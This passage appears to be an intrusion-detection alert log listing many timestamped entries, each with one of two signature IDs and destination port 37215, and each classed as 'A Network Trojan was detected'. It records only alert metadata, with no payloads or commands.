              Timestamp:05/24/24-10:59:19.982232
              SID:2829579
              Source Port:40256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.602781
              SID:2835222
              Source Port:48062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099882
              SID:2835222
              Source Port:60490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504483
              SID:2835222
              Source Port:54832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536713
              SID:2835222
              Source Port:33120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487342
              SID:2829579
              Source Port:52426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833008
              SID:2829579
              Source Port:43932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.289210
              SID:2835222
              Source Port:33174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.480424
              SID:2835222
              Source Port:34000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.884737
              SID:2835222
              Source Port:34392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536052
              SID:2829579
              Source Port:41256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.077038
              SID:2835222
              Source Port:58500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100412
              SID:2829579
              Source Port:37546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.124822
              SID:2829579
              Source Port:51940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398433
              SID:2835222
              Source Port:57456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148821
              SID:2835222
              Source Port:37594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368535
              SID:2835222
              Source Port:43666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.403046
              SID:2835222
              Source Port:51878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040396
              SID:2835222
              Source Port:46232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049295
              SID:2829579
              Source Port:53744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.268487
              SID:2835222
              Source Port:53062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.402282
              SID:2829579
              Source Port:35800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494270
              SID:2829579
              Source Port:33480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519604
              SID:2835222
              Source Port:35656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098755
              SID:2835222
              Source Port:44324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.309236
              SID:2829579
              Source Port:53126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484311
              SID:2829579
              Source Port:58092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518588
              SID:2829579
              Source Port:59238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542900
              SID:2829579
              Source Port:43396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430615
              SID:2835222
              Source Port:34536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063001
              SID:2835222
              Source Port:51750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057480
              SID:2829579
              Source Port:38868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.160585
              SID:2829579
              Source Port:60044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725069
              SID:2835222
              Source Port:39492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494348
              SID:2829579
              Source Port:42040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.163565
              SID:2829579
              Source Port:41442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.451303
              SID:2829579
              Source Port:46836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764475
              SID:2829579
              Source Port:60074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860096
              SID:2835222
              Source Port:46516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246329
              SID:2829579
              Source Port:39798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446956
              SID:2829579
              Source Port:35294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.196807
              SID:2835222
              Source Port:37706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148498
              SID:2829579
              Source Port:46338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098103
              SID:2835222
              Source Port:44544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.826093
              SID:2829579
              Source Port:38810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.159811
              SID:2835222
              Source Port:56330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.391573
              SID:2829579
              Source Port:33942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.096730
              SID:2835222
              Source Port:49192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.462895
              SID:2829579
              Source Port:58444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502342
              SID:2835222
              Source Port:51822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596167
              SID:2829579
              Source Port:49748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.409239
              SID:2835222
              Source Port:49648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329704
              SID:2835222
              Source Port:36620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804545
              SID:2829579
              Source Port:34706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.828648
              SID:2829579
              Source Port:54136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233722
              SID:2835222
              Source Port:48738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833794
              SID:2829579
              Source Port:41816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100541
              SID:2835222
              Source Port:53818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430061
              SID:2829579
              Source Port:37480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.707121
              SID:2829579
              Source Port:44786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.124853
              SID:2829579
              Source Port:42360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.776733
              SID:2829579
              Source Port:32780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857744
              SID:2835222
              Source Port:42100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411580
              SID:2829579
              Source Port:55314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395113
              SID:2829579
              Source Port:52876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493082
              SID:2829579
              Source Port:37008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918164
              SID:2835222
              Source Port:45528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.819463
              SID:2835222
              Source Port:35664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.874758
              SID:2829579
              Source Port:34986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045001
              SID:2829579
              Source Port:57906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278183
              SID:2829579
              Source Port:56470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430539
              SID:2829579
              Source Port:57662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232669
              SID:2829579
              Source Port:54224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368705
              SID:2835222
              Source Port:51818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530833
              SID:2835222
              Source Port:40640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.987454
              SID:2835222
              Source Port:38952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.495237
              SID:2829579
              Source Port:56348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341335
              SID:2829579
              Source Port:59152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441999
              SID:2829579
              Source Port:51870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450166
              SID:2829579
              Source Port:56834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483189
              SID:2829579
              Source Port:59490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.607005
              SID:2835222
              Source Port:36570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.149223
              SID:2829579
              Source Port:56948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.584482
              SID:2835222
              Source Port:52262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.432239
              SID:2829579
              Source Port:36666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.989522
              SID:2829579
              Source Port:45322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.525319
              SID:2829579
              Source Port:48124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727003
              SID:2829579
              Source Port:58970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.429775
              SID:2829579
              Source Port:52614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535989
              SID:2829579
              Source Port:50444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060972
              SID:2835222
              Source Port:51084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520237
              SID:2829579
              Source Port:45564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303373
              SID:2835222
              Source Port:37862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358583
              SID:2835222
              Source Port:56698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355151
              SID:2829579
              Source Port:38342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799252
              SID:2829579
              Source Port:43594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.371973
              SID:2835222
              Source Port:35082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.880819
              SID:2835222
              Source Port:58202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536601
              SID:2835222
              Source Port:55900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.539999
              SID:2835222
              Source Port:50526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459098
              SID:2829579
              Source Port:35078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045171
              SID:2829579
              Source Port:51742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576492
              SID:2829579
              Source Port:46366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.149116
              SID:2829579
              Source Port:53096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926623
              SID:2835222
              Source Port:41432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.363200
              SID:2829579
              Source Port:34098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372503
              SID:2829579
              Source Port:50730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574420
              SID:2829579
              Source Port:42624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103140
              SID:2835222
              Source Port:36690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.408170
              SID:2835222
              Source Port:33190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148735
              SID:2829579
              Source Port:60804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432401
              SID:2829579
              Source Port:45804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433397
              SID:2835222
              Source Port:48324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198731
              SID:2829579
              Source Port:35970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801474
              SID:2829579
              Source Port:41370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625244
              SID:2829579
              Source Port:56494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918230
              SID:2835222
              Source Port:57946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.738764
              SID:2835222
              Source Port:59348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705996
              SID:2829579
              Source Port:57918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535980
              SID:2829579
              Source Port:43404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.364539
              SID:2829579
              Source Port:50272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433501
              SID:2835222
              Source Port:36568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188820
              SID:2829579
              Source Port:60652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477171
              SID:2829579
              Source Port:43760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.921227
              SID:2829579
              Source Port:35722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.050048
              SID:2829579
              Source Port:35188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481541
              SID:2835222
              Source Port:42830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634041
              SID:2835222
              Source Port:34876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967472
              SID:2829579
              Source Port:51062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.068874
              SID:2829579
              Source Port:43630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125446
              SID:2835222
              Source Port:36662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303320
              SID:2835222
              Source Port:46772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360836
              SID:2835222
              Source Port:44396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116140
              SID:2835222
              Source Port:36542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.351127
              SID:2835222
              Source Port:38946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113460
              SID:2829579
              Source Port:58864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102854
              SID:2829579
              Source Port:48428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303204
              SID:2829579
              Source Port:41036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078152
              SID:2835222
              Source Port:55192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802984
              SID:2835222
              Source Port:56184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988764
              SID:2835222
              Source Port:57750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.982399
              SID:2829579
              Source Port:42472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455299
              SID:2835222
              Source Port:46134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.309269
              SID:2835222
              Source Port:42196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.070997
              SID:2835222
              Source Port:50214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.704953
              SID:2829579
              Source Port:45762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.167392
              SID:2829579
              Source Port:36948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098772
              SID:2835222
              Source Port:51064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.080683
              SID:2829579
              Source Port:60516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536017
              SID:2829579
              Source Port:48154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.586897
              SID:2829579
              Source Port:52190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575489
              SID:2829579
              Source Port:48578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150850
              SID:2829579
              Source Port:54194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064620
              SID:2829579
              Source Port:44528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.402264
              SID:2835222
              Source Port:51058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246412
              SID:2829579
              Source Port:45880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.209644
              SID:2835222
              Source Port:37292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.161174
              SID:2829579
              Source Port:42106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270015
              SID:2829579
              Source Port:42026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575170
              SID:2835222
              Source Port:58206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204490
              SID:2829579
              Source Port:41730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623868
              SID:2829579
              Source Port:41284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928761
              SID:2829579
              Source Port:34774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.971138
              SID:2829579
              Source Port:45044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.515593
              SID:2835222
              Source Port:52260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518867
              SID:2829579
              Source Port:38658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975307
              SID:2829579
              Source Port:36168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671552
              SID:2829579
              Source Port:54100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545166
              SID:2829579
              Source Port:46604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695062
              SID:2829579
              Source Port:56906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.253150
              SID:2829579
              Source Port:57462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.697417
              SID:2829579
              Source Port:43758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530784
              SID:2829579
              Source Port:41116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062275
              SID:2835222
              Source Port:47824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116665
              SID:2835222
              Source Port:47112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100941
              SID:2835222
              Source Port:41408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100591
              SID:2829579
              Source Port:34040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108086
              SID:2829579
              Source Port:56864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663346
              SID:2835222
              Source Port:49420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480914
              SID:2835222
              Source Port:32880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517378
              SID:2829579
              Source Port:52414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.430634
              SID:2835222
              Source Port:51562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553591
              SID:2829579
              Source Port:42008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923713
              SID:2829579
              Source Port:50974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459848
              SID:2835222
              Source Port:35826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518558
              SID:2829579
              Source Port:50112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431536
              SID:2829579
              Source Port:43138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121987
              SID:2835222
              Source Port:45470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.210222
              SID:2829579
              Source Port:46242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.917876
              SID:2835222
              Source Port:34258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284757
              SID:2829579
              Source Port:52064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062275
              SID:2835222
              Source Port:49724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368551
              SID:2835222
              Source Port:35254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155573
              SID:2829579
              Source Port:56888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.109418
              SID:2829579
              Source Port:57832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154332
              SID:2835222
              Source Port:42724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545481
              SID:2829579
              Source Port:33758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485912
